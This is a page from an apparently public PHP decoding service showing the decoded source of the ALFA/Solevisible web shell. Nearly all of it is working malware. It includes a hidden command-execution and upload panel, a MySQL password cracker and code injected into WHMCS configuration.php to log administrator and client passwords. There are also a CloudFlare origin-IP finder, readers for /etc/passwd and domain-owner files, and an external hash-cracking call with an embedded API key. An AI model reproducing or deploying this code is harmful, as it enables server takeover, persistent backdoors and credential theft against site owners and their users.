Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

<?php } } goto I6J3n; LsgNQ: function alfaget_flags() { $flags = array(); if (function_ex..

Decoded Output download

<?php  } } goto I6J3n; LsgNQ: function alfaget_flags() { $flags = array(); if (function_exists("curl_version")) { $curl = new AlfaCURL(); $server_addr = !@$_SERVER["SERVER_ADDR"] ? function_exists("gethostbyname") ? @gethostbyname($_SERVER["SERVER_NAME"]) : "????" : @$_SERVER["SERVER_ADDR"]; $flag = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $server_addr); $flag2 = $curl->Send("http://www.geoplugin.net/json.gp?ip=" . $_SERVER["REMOTE_ADDR"]); if (strpos($flag2, "geoplugin") != false) { $flag = json_decode($flag, true); $flag2 = json_decode($flag2, true); if (!empty($flag["geoplugin_countryCode"])) { $flags["server"]["name"] = $flag["geoplugin_countryName"]; $flags["server"]["code"] = $flag["geoplugin_countryCode"]; } if (!empty($flag2["geoplugin_countryCode"])) { $flags["client"]["name"] = $flag2["geoplugin_countryName"]; $flags["client"]["code"] = $flag2["geoplugin_countryCode"]; } } } echo json_encode($flags); } goto Q03qj; ppnhy: if (!isset($GLOBALS["DB_NAME"]["login_page"])) { die("$GLOBALS['DB_NAME']['login_page']"); } goto TMWW9; XTnlF: function __pre() { return "<pre id="strOutput" style="margin-top:5px" class="ml1">"; } goto KOYJ5; FVVeJ: function alfaSize($s) { if ($s >= 1073741824) { return sprintf("%1.2f", $s / 1073741824) . " GB"; } elseif ($s >= 1048576) { return sprintf("%1.2f", $s / 1048576) . " MB"; } elseif ($s >= 1024) { return sprintf("%1.2f", $s / 1024) . " KB"; } else { return $s . " B"; } } goto dfoFS; fCNwV: function Alfa_Mysql_Cracker($info) { if (@mysqli_connect($info["target"] . ":" . $info["port"], $info["username"], $info["password"])) { CrackerResualt($info); echo "UserName: <font color="red">" . $info["username"] . "</font> PassWord: <font color="red">" . $info["password"] . "</font><font color="green">  Login Success....</font><br>"; } } goto i2b2c; kS5vr: function hijackWhmcs($path, $saveto) { $code = "<?php if(isset($_POST['username']) AND isset($_POST['password']) AND !empty($_POST['username']) AND !empty($_POST['password'])){if($alfa_connect=@mysqli_connect($db_host,$db_username,$db_password,$db_name)){$alfa_file = "{saveto_path}";$alfa_uname = @$_POST['username'];$alfa_pw = @$_POST['password'];if(isset($_POST['language'])){$alfa_q = "SELECT * FROM tbladmins WHERE `username` = '$alfa_uname' AND `password` = '".md5($alfa_pw)."'";$admin = true;}else{$alfa_q = "SELECT * FROM tblclients WHERE `email` = '$alfa_uname'";$admin = false;}$alfa_query = mysqli_query($alfa_connect, $alfa_q);if(mysqli_num_rows($alfa_query) > 0 ){$row = mysqli_fetch_array($alfa_query);$allow = true;if(!$admin){$__salt = explode(':', $row['password']);$__encPW = md5($__salt[1].$_POST['password']).':'.$__salt[1];if($row['password'] == $__encPW){$allow = true;$row['username'] = $row['email'];}else{$allow = false;}}if($allow){$fp = @fopen($alfa_file, "a+");@fwrite($fp, $row['username'] . ' : ' .  $alfa_pw." (" . $row["email"] . ") : ".($admin ? 'is_admin' : 'is_user')."\n");@fclose($fp);$f = @file($alfa_file);$new = array_unique($f);$fp = @fopen($alfa_file, "w");foreach($new as $values){@fwrite($fp, $values);}@fclose($fp);}}}}?>"; $code = str_replace("{saveto_path}", $saveto, $code); $conf = $path . "/configuration.php"; if (@is_file($conf) and @is_writable($conf)) { $data_conf = @file_get_contents($conf); if (!strstr($data_conf, "?>")) { $code = "?>" . $code; } $evil_conf = $data_conf . "\xa" . $code; @file_put_contents($conf, $evil_conf); hijackOutput(0, $saveto); } else { hijackOutput(1); } } goto qpgQy; kr6dX: function alfacloudflare() { alfahead(); AlfaNum(8, 9, 10, 7, 6, 5, 4, 3); echo "<div class=header><center><br><div class='txtfont_header'>| Cloud Flare ByPasser |</div><br><form action='' onsubmit="g('cloudflare',null,this.url.value,'>>'); return false;" method='post'>
<p><div class='txtfont'>Target:</div> <input type='text' size=30 name='url' style='text-align:center;' placeholder="target.com"> <input type='submit' name='go' value=' ' /></p></form></center>"; if ($_POST["alfa2"] && $_POST["alfa2"] == ">>") { $url = $_POST["alfa1"]; if (!preg_match("/^(https?):\/\/(w{3}|w3)\./i", $url)) { $url = preg_replace("/^(https?):\/\//", '', $url); $url = "http://www." . $url; } $headers = @get_headers($url, 1); $server = $headers["Server"]; $subs = array("owa.", "2tty.", "m.", "gw.", "mx1.", "store.", "1", "2", "vb.", "news.", "download.", "video", "cpanel.", "ftp.", "server1.", "cdn.", "cdn2.", "ns.", "ns3.", "mail.", "webmail.", "direct.", "direct-connect.", "record.", "ssl.", "dns.", "help.", "blog.", "irc.", "forum.", "dl.", "my.", "cp.", "portal.", "kb.", "support.", "search.", "docs.", "files.", "accounts.", "secure.", "register.", "apps.", "beta.", "demo.", "smtp.", "ns2.", "ns1.", "server.", "shop.", "host.", "web.", "cloud.", "api.", "exchange.", "app.", "vps.", "owa.", "sat.", "bbs.", "movie.", "music.", "art.", "fusion.", "maps.", "forums.", "acc.", "cc.", "dev.", "ww42.", "wiki.", "clients.", "client.", "books.", "answers.", "service.", "groups.", "images.", "upload.", "up.", "tube.", "users.", "admin.", "administrator.", "private.", "design.", "whmcs.", "wp.", "wordpress.", "joomla.", "vbulletin.", "test.", "developer.", "panel.", "contact."); if (preg_match("/^(https?):\/\/(w{3}|w3)\./i", $url, $matches)) { if ($matches[2] != "www") { $url = preg_replace("/^(https?):\/\//", '', $url); } else { $url = explode($matches[0], $url); $url = $url[1]; } } if (is_array($server)) { $server = $server[0]; } echo __pre(); if (preg_match("/cloudflare/i", $server)) { echo "\xa[+] CloudFlare detected: {$server}\xa<br>"; } else { echo "
[+] CloudFlare wasn't detected, proceeding anyway.
"; } echo "[+] CloudFlare IP: " . is_ipv4(gethostbyname($url)) . "

<br><br>"; echo "[+] Searching for more IP addresses.\xa\xa<br><br>"; for ($x = 0; $x < count($subs); $x++) { $site = $subs[$x] . $url; $ip = is_ipv4(gethostbyname($site)); if ($ip == "(Null)") { continue; } echo "Trying {$site}: {$ip}
<br>"; } echo "\xa[+] Finished.
<br>"; } echo "</div>"; alfafooter(); } goto SXwEV; GIU6h: function _alfa_fsockopen($server, $uri, $post) { $socket = @fsockopen($server, 80, $errno, $errstr, 15); if ($socket) { $http = "POST {$uri} HTTP/1.0\xd
"; $http .= "Host: {$server}
\xa"; $http .= "User-Agent: " . $_SERVER["HTTP_USER_AGENT"] . "
"; $http .= "Content-Type: application/x-www-form-urlencoded
\xa"; $http .= "Content-length: " . strlen($post) . "
"; $http .= "Connection: close\xd
\xd
"; $http .= $post . "
\xa
"; fwrite($socket, $http); $contents = ''; while (!@feof($socket)) { $contents .= @fgets($socket, 4096); } list($header, $body) = explode("\xd
\xd
", $contents, 2); @fclose($socket); return $body; } else { return ''; } } goto i_y5V; pr1zO: function alfacheckcgi() { if (strlen(alfaEx("id", false, true, true)) > 0) { echo "ok"; } else { echo "no"; } } goto nWc3X; mG6El: $OVpGNqqFZs = "e" . "v" . "al"; goto W1P0Y; TMWW9: if (!isset($GLOBALS["DB_NAME"]["show_icons"])) { die("$GLOBALS['DB_NAME']['show_icons']"); } goto uDSKO; VBrHH: function alfaarchive_manager() { alfahead(); $file = $_POST["alfa2"]; if (!file_exists($file)) { $file = $GLOBALS["cwd"]; } $rand_id = rand(9999, 999999); echo "<div class=header><center><p><div class="txtfont_header">| Archive Manager |</div></p>"; echo "<form name="srch" onSubmit="g('archive_manager',null,null,this.file.value,null,null,'>>');return false;" method='post'>
	<div class="txtfont">
	Archive file: <input size="50" id="target" type="text" name="file" value="" . $file . "">\xa\x9<input type="submit" name="btn" value=" "></div></form></center><br>"; if ($_POST["alfa5"] == ">>") { echo "<hr><div style="margin-left: 12px;" archive_full="phar://" . $file . "" archive_name="" . basename($file) . "" id="archive_dir_" . $rand_id . "" class="archive_dir_holder"><span>PWD: </span><div class="archive_pwd_holder" style="display:inline-block"><a>/</a></div></div>"; echo "<div style="padding: 10px;" id="archive_base_" . $rand_id . "">"; __alfa_open_archive_file($file, $rand_id); echo "</div>"; } echo "</div>"; alfafooter(); } goto Sp5QA; he7vt: function alfacpcrack() { alfahead(); echo "<div class=header><center><p><div class="txtfont_header">| Hash Tools |</div></p><h3><a href=javascript:void(0) onclick="g('cpcrack',null,'dec')">| DeCrypter | </a><a href=javascript:void(0) onclick="g('cpcrack',null,'analyzer')">| Hash Analyzer | </a></h3></center>"; if ($_POST["alfa1"] == "dec") { $algorithms = array("md5" => "MD5", "md4" => "MD4", "sha1" => "SHA1", "sha256" => "SHA256", "sha384" => "SHA384", "sha512" => "SHA512", "ntlm" => "NTLM"); echo "<center><div class="txtfont_header">| DeCrypter |</div><br><br>\xa<form onsubmit="g('cpcrack',null,'dec',this.md5.value,'>>',this.alg.value); return false;"><div class="txtfont">Decrypt Method:</div> <select name="alg" style="width:100px;">"; foreach ($algorithms as $key => $val) { echo "<option value="" . $key . "">" . $val . "</option>"; } echo "</select><input type="text" placeholder="Hash" name="md5" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>"; if ($_POST["alfa3"] == ">>") { $hash = $_POST["alfa2"]; if (!empty($hash)) { $hash_type = $_POST["alfa4"]; $email = "[email protected]"; $code = "7b9fa79f92c3cd96"; $target = "https://md5decrypt.net/Api/api.php?hash=" . $hash . "&hash_type=" . $hash_type . "&email=" . $email . "&code=" . $code; $resp = @file_get_contents($target); if ($resp == '') { $get = new AlfaCURL(); $resp = $get->Send($target); } echo __pre() . "<center>"; switch ($resp) { case "CODE ERREUR : 001": echo "<b><font color='red'>You exceeded the 400 allowed request per day</font></b>"; break; case "CODE ERREUR : 003": echo "<b><font color='red'>Your request includes more than 400 hashes.</font></b>"; break; case "CODE ERREUR : 004": echo "<b><font color='red'>The type of hash you provide in the argument hash_type doesn't seem to be valid</font></b>"; break; case "CODE ERREUR : 005": echo "<b><font color='red'>The hash you provide doesn't seem to match with the type of hash you set.</font></b>"; break; } if (substr($resp, 0, 4) != "CODE" && $resp != '') { echo "<b>Result: <font color='green'>" . $resp . "</font></b>"; } elseif (substr($resp, 0, 4) != "CODE") { echo "<font color='red'>NoT Found</font><br />"; } echo "</center>"; } } } if ($_POST["alfa1"] == "analyzer") { echo "<center><p><div class="txtfont_header">| Hash Analyzer |</div></p>\xa<form onsubmit="g('cpcrack',null,'analyzer',this.hash.value,'>>');return false;">\xa<div class="txtfont">Hash: </div> <input type="text" placeholder="Hash" name="hash" size="60" id="text" /> <input type="submit" value=" " name="go" /></form></center><br>"; if ($_POST["alfa3"] == ">>") { $hash = $_POST["alfa2"]; if (!empty($hash)) { $curl = new AlfaCURL(); $resp = $curl->Send("https://md5decrypt.net/en/HashFinder/", "post", "hash={$hash}&crypt=Search"); echo __pre() . "<center>"; if (preg_match("#<fieldset class="trouve">(.*?)</fieldset>#", $resp, $s)) { echo "<font color="green">" . $s[1] . "</font>"; } else { echo "<font color="red">Not Found...!</font>"; } echo "</center><br>"; } } } echo "</div>"; alfafooter(); } goto BhkkX; i_y5V: if (isset($_GET["solevisible"])) { @error_reporting(E_ALL ^ E_NOTICE); echo "<html>"; echo "<title>Solevisible Hidden Shell</title>"; echo "<body bgcolor=#000000>"; echo "<b><big><font color=#7CFC00>Kernel : </font><font color="#FFFFF">" . (function_exists("php_uname") ? php_uname() : "???") . "</font></b></big>"; $safe_mode = @ini_get("safe_mode"); if ($safe_mode) { $r = "<b style='color: red'>On</b>"; } else { $r = "<b style='color: green'>Off</b>"; } echo "<br><b style='color: #7CFC00'>OS: </font><font color=white>" . PHP_OS . "</font><br>"; echo "<b style='color: #7CFC00'>Software: </font><font color=white>" . $_SERVER["SERVER_SOFTWARE"] . "</font><br>"; echo "PHP Version: <font color=white>" . PHP_VERSION . "</font><br />"; echo "PWD:<font color=#FFFFFF> " . str_replace("\", "/", @alfaGetCwd()) . "/<br />"; echo "<b style='color: #7CFC00'>Safe Mode : {$r}<br>"; echo "<font color=#7CFC00>Disable functions : </font>"; $disfun = @ini_get("disable_functions"); if (empty($disfun)) { $disfun = "<font color="green">NONE</font>"; } echo "<font color=red>"; echo "{$disfun}"; echo "</font><br>"; echo "<b style='color: #7CFC00'>Your Ip Address is :  </font><font color=white>" . $_SERVER["REMOTE_ADDR"] . "</font><br>"; echo "<b style='color: #7CFC00'>Server Ip Address is :  </font><font color=white>" . (function_exists("gethostbyname") ? @gethostbyname($_SERVER["HTTP_HOST"]) : "???") . "</font><br><p>"; echo "<hr><center><form onSubmit="this.upload.disabled=true;this.cwd.value = btoa(unescape(encodeURIComponent(this.cwd.value)));" action="" method="post" enctype="multipart/form-data" name="uploader" id="uploader">"; echo "CWD: <input type="text" name="cwd" value="" . str_replace("\", "/", @alfaGetCwd()) . "/" size="59"><p><input type="file" name="file" size="45"><input name="upload" type="submit" id="_upl" value="Upload"></p></form></center>"; if (isset($_FILES["file"])) { if (@move_uploaded_file($_FILES["file"]["tmp_name"], __ZGVjb2Rlcg(@$_POST["cwd"]) . "/" . $_FILES["file"]["name"])) { echo "<b><font color="#7CFC00"><center>Upload Successfully ;)</font></a><font color="#7CFC00"></b><br><br></center>"; } else { echo "<center><b><font color="#7CFC00">Upload failed :(</font></a><font color="#7CFC0"></b></center><br><br>"; } } echo "<hr><form onSubmit="this.execute.disabled=true;this.command_solevisible.value = btoa(unescape(encodeURIComponent(this.command_solevisible.value)));" method="POST">Execute Command: <input name="command_solevisible" value="" size="59" type="text" align="left" ><input name="execute" value="Execute" type="submit"><br></form>\xa<hr><pre>"; if (isset($_POST["command_solevisible"])) { if (strtolower(substr(PHP_OS, 0, 3)) == "win") { $separator = "&"; } else { $separator = ";"; } $solevisible = "cd '" . addslashes(str_replace("\", "/", @alfaGetCwd())) . "'" . $separator . '' . __ZGVjb2Rlcg($_POST["command_solevisible"]); echo alfaEx($solevisible); } echo "</pre>
</body></html>"; die; } goto nhViU; BXSlk: @set_time_limit(0); goto Os8cj; pQYlh: function Alfa_StrSearcher($dir, $string, $ext, $e, $arr = array()) { if (@is_dir($dir)) { $files = @scandir($dir); foreach ($files as $key => $value) { $path = @realpath($dir . DIRECTORY_SEPARATOR . $value); if (!@is_dir($path)) { if ($ext != "*") { $f = basename($path); $f = explode(".", $f); $f = end($f); if ($f != $ext) { continue; } } if ($e == "str") { $content = @file_get_contents($path); if (strpos($content, $string) !== false) { echo str_replace("\", "/", $path) . "<br>"; } } else { if (strstr($value, $string)) { echo str_replace("\", "/", $path) . "<br>"; } } $results[] = $path; } elseif ($value != "." && $value != "..") { Alfa_StrSearcher($path, $string, $ext, $e, $results); $results[] = $path; } } } } goto zHgw5; HL3qe: function alfaEx($in, $re = false, $cgi = true, $all = false) { $data = _alfa_php_cmd($in, $re); if (empty($data) && $cgi || $all) { if ($GLOBALS["sys"] == "unix") { if (strlen(_alfa_php_cmd("whoami")) == 0 || $all) { $cmd = _alfa_cgicmd($in); if (!empty($cmd)) { return $cmd; } } } } return $data; } goto KtNd0; rUSPf: @ini_set("log_errors", 0); goto CrZw0; oMz56: function __alfa_set_cookie($key, $value) { $_COOKIE[$key] = $value; @setcookie($key, $value, time() + 86400 * 7, "/"); } goto hId6W; qr6DC: function __alert($s) { echo "<center>" . __pre() . $s . "</center>"; } goto Wo4n0; HVzUJ: if ($GLOBALS["sys"] == "win") { $GLOBALS["home_cwd"] = str_replace("\", "/", $GLOBALS["home_cwd"]); $GLOBALS["cwd"] = str_replace("\", "/", $GLOBALS["cwd"]); } goto FN_bJ; zUXll: function bcinit($evalType, $evalCode, $evalOptions, $evalArguments) { $res = "<font color='green'>[ Success...! ]</font>"; $err = "<font color='red'>[ Failed...! ]</font>"; if ($evalOptions != '') { $evalOptions = $evalOptions . " "; } if ($evalArguments != '') { $evalArguments = " " . $evalArguments; } if ($evalType == "c") { $tmpdir = ALFA_TEMPDIR; chdir($tmpdir); if (is_writable($tmpdir)) { $uniq = substr(md5(time()), 0, 8); $filename = $evalType . $uniq . ".c"; $path = $filename; if (__write_file($path, $evalCode)) { $ext = $GLOBALS["sys"] == "win" ? ".exe" : ".out"; $pathres = $filename . $ext; $evalOptions = "-o " . $pathres . " " . $evalOptions; $cmd = "gcc " . $evalOptions . $path; alfaEx($cmd); if (is_file($pathres)) { if (chmod($pathres, 493)) { $cmd = $pathres . $evalArguments; alfaEx($cmd); } else { $res = $err; } unlink($pathres); } else { $res = $err; } unlink($path); } else { $res = $err; } } return $res; } elseif ($evalType == "java") { $tmpdir = ALFA_TEMPDIR; chdir($tmpdir); if (is_writable($tmpdir)) { if (preg_match("/class\ ([^{]+){/i", $evalCode, $r)) { $classname = trim($r[1]); $filename = $classname; } else { $uniq = substr(md5(time()), 0, 8); $filename = $evalType . $uniq; $evalCode = "class " . $filename . " { " . $evalCode . " } "; } $path = $filename . ".java"; if (__write_file($path, $evalCode)) { $cmd = "javac " . $evalOptions . $path; alfaEx($cmd); $pathres = $filename . ".class"; if (is_file($pathres)) { if (chmod($pathres, 493)) { $cmd = "java " . $filename . $evalArguments; alfaEx($cmd); } else { $res = $err; } unlink($pathres); } else { $res = $err; } unlink($path); } else { $res = $err; } } return $res; } return false; } goto PnxkJ; wK3Iv: function hijackOutput($c = 0, $p = '') { echo $c == 0 ? "<center><font color='green'>Success</font> --> path: {$p}</center>" : "<center><font color="red">Error in inject code !</font></center>"; } goto pQYlh; eiihp: function copy_paste($c, $s, $d) { if (@is_dir($c . $s)) { @mkdir($d . $s); $h = @opendir($c . $s); while (($f = @readdir($h)) !== false) { if ($f != "." and $f != "..") { copy_paste($c . $s . "/", $f, $d . $s . "/"); } } } elseif (is_file($c . $s)) { @copy($c . $s, $d . $s); } } goto tWrGE; TWvKj: function alfaSettings() { alfahead(); AlfaNum(6, 7, 8, 9, 10); echo "<div class=header><center><p><div class="txtfont_header">| Settings |</div></p><h3><a href=javascript:void(0) onclick="g('settings',null,null,null,null,null,null,null,null,'main')">| Generall Setting | </a></h3></center>"; if ($_POST["alfa8"] == "main") { echo "<p><center><div class="txtfont_header">| Settings |</div></p><form onSubmit="reloadSetting(this);return false;" method='post'>"; $lg_array = array("0" => "No", "1" => "Yes"); $penc_array = array("false" => "No", "true" => "Yes"); $protect_html = ''; $icon_html = ''; $postEnc_html = ''; $login_html = ''; $cgiapi_html = ''; foreach ($lg_array as $key => $val) { $protect_html .= "<option value="" . $key . "" " . ($GLOBALS["DB_NAME"]["safemode"] == "1" ? "selected" : '') . ">" . $val . "</option>"; } foreach ($lg_array as $key => $val) { $icon_html .= "<option value="" . $key . "" " . ($GLOBALS["DB_NAME"]["show_icons"] == "1" ? "selected" : '') . ">" . $val . "</option>"; } foreach ($penc_array as $key => $val) { $cgiapi_html .= "<option value="" . $key . "" " . (!empty($_POST["alfa9"]) && $_POST["alfa9"] == $key ? "selected" : ($GLOBALS["DB_NAME"]["cgi_api"] && empty($_POST["alfa9"]) ? "selected" : '')) . ">" . $val . "</option>"; } foreach ($penc_array as $key => $val) { $postEnc_html .= "<option value="" . $key . "" " . (!empty($_POST["alfa7"]) && $_POST["alfa7"] == $key ? "selected" : (__ALFA_POST_ENCRYPTION__ && empty($_POST["alfa7"]) ? "selected" : '')) . ">" . $val . "</option>"; } $lg_array = array("gui" => "GUI", "500" => "500 Internal Server Error", "403" => "403 Forbidden", "404" => "404 NotFound"); foreach ($lg_array as $key => $val) { $login_html .= "<option value="" . $key . "" " . ($GLOBALS["DB_NAME"]["login_page"] == $key ? "selected" : '') . ">" . $val . "</option>"; } echo ''; echo "<table border="1"><tbody><tr><td><div class="tbltxt" style="color:#FFFFFF">Protect:</div></td><td><select name="protect" style="width:100%;">" . $protect_html . "</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Cgi Api:</div></td><td><select name="cgi_api" style="width:100%;">" . $cgiapi_html . "</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Post Encryption:</div></td><td><select name="post_encrypt" style="width:100%;">" . $postEnc_html . "</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Show Icons:</div></td><td><select name="icon" style="width:100%;">" . $icon_html . "</select></td></tr><tr><tr><td><div class="tbltxt" style="color:#FFFFFF">login Page:</div></td><td><select style="width:100%;" name="lgpage">" . $login_html . "</select></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">UserName:</div></td><td><input type="text" style="width:95%;" name="username" value="" . (empty($_POST["alfa3"]) ? $GLOBALS["DB_NAME"]["user"] : $_POST["alfa3"]) . "" placeholder="solevisible"></td></tr><tr><td><div class="tbltxt" style="color:#FFFFFF">Password:</div></td><td><input type="text" style="width:95%;" name="password" placeholder="*****"></td></tr></tbody></table><input type="hidden" name="e" value="" . $GLOBALS["DB_NAME"]["safemode"] . ""><input type="hidden" name="s" value="" . $GLOBALS["DB_NAME"]["show_icons"] . ""><p><input type="submit" name="btn" value=" "></p></form></center>"; if ($_POST["alfa5"] == ">>") { echo __pre(); if (!empty($_POST["alfa3"])) { $protect = $_POST["alfa1"]; $lgpage = $_POST["alfa2"]; $username = $_POST["alfa3"]; $password = md5($_POST["alfa4"]); $icon = $_POST["alfa6"]; $post_encrypt = $_POST["alfa7"]; $cgi_api_val = $_POST["alfa9"]; @chdir($GLOBALS["home_cwd"]); $basename = @basename($_SERVER["PHP_SELF"]); $data = @file_get_contents($basename); $user_rand = $GLOBALS["DB_NAME"]["user_rand"]; $pass_rand = $GLOBALS["DB_NAME"]["pass_rand"]; $login_page_rand = $GLOBALS["DB_NAME"]["login_page_rand"]; $safemode_rand = $GLOBALS["DB_NAME"]["safemode_rand"]; $show_icons_rand = $GLOBALS["DB_NAME"]["show_icons_rand"]; $post_encryption_rand = $GLOBALS["DB_NAME"]["post_encryption_rand"]; $cgi_api_rand = $GLOBALS["DB_NAME"]["cgi_api_rand"]; $find_user = "/'" . $user_rand . "'(.*?),/i"; $find_pw = "/'" . $pass_rand . "'(.*?),/i"; $find_lg = "/'" . $login_page_rand . "'(.*?),/i"; $find_p = "/'" . $safemode_rand . "'(.*?),/i"; $icons = "/'" . $show_icons_rand . "'(.*?),/i"; $postEnc = "/'" . $post_encryption_rand . "'(.*?),/i"; $cgi_api_reg = "/'" . $cgi_api_rand . "'(.*?),/i"; if (!empty($username) && preg_match($find_user, $data, $e)) { $new = "'" . $user_rand . "' => '" . $username . "',"; $data = str_replace($e[0], $new, $data); } if (!empty($_POST["alfa4"]) && preg_match($find_pw, $data, $e)) { $new = "'" . $pass_rand . "' => '" . $password . "',"; $data = str_replace($e[0], $new, $data); } if (!empty($lgpage) && preg_match($find_lg, $data, $e)) { $new = "'" . $login_page_rand . "' => '" . $lgpage . "',"; $data = str_replace($e[0], $new, $data); } if (!empty($find_p) && preg_match($find_p, $data, $e)) { $new = "'" . $safemode_rand . "' => '" . $protect . "',"; $data = str_replace($e[0], $new, $data); } if (preg_match($icons, $data, $e)) { $new = "'" . $show_icons_rand . "' => '" . $icon . "',"; $data = str_replace($e[0], $new, $data); } if (preg_match($postEnc, $data, $e)) { $new = "'" . $post_encryption_rand . "' => " . $post_encrypt . ","; $data = str_replace($e[0], $new, $data); } if (preg_match($cgi_api_reg, $data, $e)) { $new = "'" . $cgi_api_rand . "' => " . $cgi_api_val . ","; $data = str_replace($e[0], $new, $data); } if (@file_put_contents($basename, $data)) { echo "<b>UserName: </b><font color="green"><b>" . $username . "</b></font><br /><b>Password: </b><font color="green"><b>" . $_POST["alfa4"] . "</b></font><script>post_encryption_mode = " . $post_encrypt . ";</script>"; } else { __alert("<span style='color:red;'>File has no edit access...!</span>"); } } else { __alert("<span style='color:red;'>UserName is Empty !</span>"); } } } elseif ($_POST["alfa8"] == "color") { echo "<center><p><div class="txtfont_header">| Custom Color |</div></p><form onSubmit="reloadColors();return false;" method='post'>"; echo "<table border="1"><tbody>"; $template = "<tr><td style="text-align:center;"><a href="http://solevisible.com/customcolors/{help}.png" target="_blank"><font color="#00FF00">Help</font></a></td><td style="text-align:center;"><div class="tbltxt">{index}</div></td><td><div class="tbltxt" style="margin-left:5px;">{target}:</div></td><td><input style="width:60px;" multi="{multi}" id="gui_{target}" onChange="colorHandler(this);" target=".{target}" type="color" value="{color}"></td><td><input type="text" style="text-align:center;" multi="{multi}" onkeyup="colorHandlerKey(this);" target=".{target}" id="input_{target}" class="colors_input" placeholder="#ffffff" value="{color}"></td></tr>"; $x = 1; foreach ($GLOBALS["__ALFA_COLOR__"] as $key => $value) { $multi = ''; if (is_array($value)) { if (isset($value["multi_selector"])) { $multi = __ZW5jb2Rlcg(json_encode($value)); } } $value = alfa_getColor($key); $help = strtolower(str_replace(array(":", "+"), array("_", "_plus"), $key)); echo str_replace(array("{index}", "{target}", "{color}", "{multi}", "{help}"), array($x++, $key, $value, $multi, $help), $template); } echo "<tr><td style="text-align:center;">-</td><td style="text-align:center;"><div class="tbltxt">*</div></td><td><div style="margin-left:5px;" class="tbltxt">Use Default Color:</div></td><td></td><td><center><input type="checkbox" id="use_default_color" value="1"></center></td></tr>"; echo "</tbody></table><p><input type="submit" name="btn" value=" "></p></form><p><button style="padding:4px;;margin-right:20px;" onclick="$('importFileBtn').click();" class="button"> Import </button> <button style="padding:4px;margin-left:20px;" onclick="g('settings',null,null,null,null,null,null,null,'export','color')" class="button"> Export </button></center></p>"; if ($_POST["alfa7"] == "export") { echo __pre(); $colors = is_array($GLOBALS["DB_NAME"]["color"]) ? $GLOBALS["DB_NAME"]["color"] : array(); $glob_colors = $GLOBALS["__ALFA_COLOR__"]; $array = array(); foreach ($glob_colors as $k => $v) { if (isset($colors[$k]) && !empty($colors[$k]) && !$is_default) { $v = trim($colors[$k]); } else { $v = trim(is_array($v) ? $v["key_color"] : $v); } $array[$k] = $v; } $file = "alfa_color_config_" . date("Y-m-d-h_i_s") . ".conf"; $config = json_encode($array, JSON_PRETTY_PRINT); if (!@file_put_contents($file, $config)) { echo "<p><center>Color Config:<br><br><textarea rows="12" cols="70" type="text">" . $config . "</textarea></center></p>"; } else { echo "<h3><p><center><a class="actions" href="javascript:void(0);" onclick="g('FilesTools',null,'" . $file . "', 'download')"><font color="#0F0">Download Config</font></a></center></p></h3>"; } } if ($_POST["alfa2"] == ">>") { echo __pre(); $colors = json_decode($_POST["alfa1"], true); $array = ''; $is_default = isset($_POST["alfa3"]) && $_POST["alfa3"] == "1" ? true : false; $glob_colors = $GLOBALS["__ALFA_COLOR__"]; foreach ($glob_colors as $k => $v) { if (isset($colors[$k]) && !empty($colors[$k]) && !$is_default) { $v = trim($colors[$k]); } else { $v = trim(is_array($v) ? $v["key_color"] : $v); } $array .= """ . trim($k) . "" => "" . $v . "","; } @chdir($GLOBALS["home_cwd"]); $basename = @basename($_SERVER["PHP_SELF"]); $data = @file_get_contents($basename); $color = "/'color'(.*?)\),/s"; if (preg_match($color, $data, $e)) { $new = "'color' => array(" . $array . "),"; $data = str_replace($e[0], $new, $data); if (@file_put_contents($basename, $data)) { echo "<center><p><h3>[+] Success...</h3></p></center><script>location.reload();</script>"; } else { echo "<center><p><h3>[-] We Not have permission to Edit shell...!</h3></p></center>"; } } else { echo "<center><p><h3>[-] Error...!</h3></p></center>"; } } } echo "</div>"; alfafooter(); } goto YNiqE; K5MFn: $GLOBALS["DB_NAME"] = $GLOBALS["oZgNypoPRU"]; goto r05Ia; i8Olb: $xd .= "Site : " . $_SERVER["HTTP_HOST"] . "
"; goto FRkec; IGhSm: function _alfa_is_writable($file) { $check = false; $check = @is_writable($file); if (!$check) { if (_alfa_can_runCommand()) { $check = alfaEx("[ -w "" . trim(addslashes($file)) . "" ] && echo "yes" || echo "no""); if ($check == "yes") { $check = true; } else { $check = false; } } } return $check; } goto HZNvy; ar_2Q: function alfasafe() { alfahead(); echo "<div class=header><center><br><div class='txtfont_header'>| Auto ByPasser |</div>"; echo "<h3><a href=javascript:void(0) onclick="g('safe',null,'php.ini',null)">| PHP.INI | </a><a href=javascript:void(0) onclick="g('safe',null,null,'ini')">| .htaccess(apache) | </a><a href=javascript:void(0) onclick="g('safe',null,null,null,'pl')">| .htaccess(LiteSpeed) |</a><a href=javascript:void(0) onclick="g('safe',null,null,null,null,'passwd')">| Read-Passwd | </a><a href=javascript:void(0) onclick="g('safe',null,null,null,null,null,'users')">| Read-Users | </a><a href=javascript:void(0) onclick="g('safe',null,null,null,null,null,null,'valiases')">| Get-User | </a><a href=javascript:void(0) onclick="g('safe',null,null,null,null,null,null,null,null,'domains')">| Get-Domains | </a></center></h3>"; if (!empty($_POST["alfa8"]) && isset($_POST["alfa8"]) == "domains") { if (!_alfa_file_exists("/etc/virtual/domainowners")) { echo __pre(); $solevisible9 = _alfa_file("/etc/named.conf"); if (is_array($solevisible9)) { foreach ($solevisible9 as $solevisible13) { if (@eregi("zone", $solevisible13)) { preg_match_all("#zone "(.*)"#", $solevisible13, $solevisible14); if (strlen(trim($solevisible14[1][0])) > 2) { echo $solevisible14[1][0] . "<br>"; } } } } } else { echo __pre(); $users = _alfa_file("/etc/virtual/domainowners"); if (is_array($users)) { foreach ($users as $boz) { $dom = explode(":", $boz); echo $dom[0] . "
"; } } } } if (!empty($_POST["alfa6"]) && isset($_POST["alfa6"]) == "valiases") { echo "
